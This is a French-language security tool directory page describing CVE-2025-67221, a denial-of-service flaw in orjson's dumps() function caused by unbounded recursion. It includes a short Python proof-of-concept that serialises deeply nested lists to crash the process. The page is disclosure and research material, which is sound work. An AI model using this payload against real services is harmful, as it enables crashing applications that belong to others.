Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-67221 — Documentation et code de reproduction pour CVE-2025-67221, une vulnérabilité de déni de service dans la fonction dumps() d'orjson causée par une récursion non contrôlée lors de la sérialisation de données JSON fortement imbriquées. | Kitploit
Outils/GitHubGitHub/kpatsakis/cve-2025-67221
Analyse des VulnérabilitésAnalyse de CodeArticles et RechercheApprentissage et Éducation
GitHubkpatsakis/cve-2025-67221

CVE-2025-67221

Documentation et code de reproduction pour CVE-2025-67221, une vulnérabilité de déni de service dans la fonction dumps() d'orjson causée par une récursion non contrôlée lors de la sérialisation de données JSON fortement imbriquées.

Voir le dépôt
112il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-67221

Résumé de la vulnérabilité

ChampValeur
Identifiant CVECVE-2025-67221
Produit affectéorjson
Versions affectées≤ 3.11.4
Type de vulnérabilitéDéni de service (récursion non contrôlée)
Vecteur d'attaqueÀ distance (si l'attaquant contrôle les données sérialisées)

Description

Une vulnérabilité de déni de service existe dans la fonction orjson.dumps() d'orjson versions 3.11.4 et antérieures. La fonction n'applique pas de limite de récursion lors de la sérialisation de structures de données JSON profondément imbriquées. Un attaquant qui peut amener une application à sérialiser des données imbriquées contrôlées par l'attaquant peut déclencher un crash dans la routine de sérialisation.

Fonction affectée

  • Fonction: orjson.dumps()
  • Fichier: pysrc/orjson/__init__.pyi

Tests

Testé sur

  • Python 3.12.3/3.11.2/3.12.3/3.13.9/3.14.0 sur Ubuntu Linux noyau 6.8.0-88
  • Python 3.13.3 Microsoft Windows 11 Éducation 10.0.26200 Build 26200

Impact

Les applications qui utilisent orjson pour sérialiser des structures de données non fiables ou contrôlées par un attaquant peuvent être vulnérables à des attaques par déni de service.

Code de reproduction

Code pour reproduire la vulnérabilité localement :

root@kitploit:~
import orjson
import sys
import platform
print(f'OS: {platform.platform()}') 
print(f'Python version: {sys. version}') 
print(f'orjson version: {orjson.__version__}')
nested = []
for i in range(100):
    nested = [{"level": i, "next": nested}]
dumped = orjson.dumps(nested)

##Démonstration Le code ci-dessus conduit à un beau core dump Démo

Auteurs / Chercheurs

  • Constantinos Patsakis, Département d'Informatique, Université du Pirée, Grèce
  • Evgenios Gkritsis, Département d'Informatique, Université d'Économie et de Commerce d'Athènes, Grèce
  • George Stergiopoulos, Département d'Informatique, Université d'Économie et de Commerce d'Athènes, Grèce

Références

  • https://github.com/ijl/orjson (Projet affecté)
Télécharger l’outil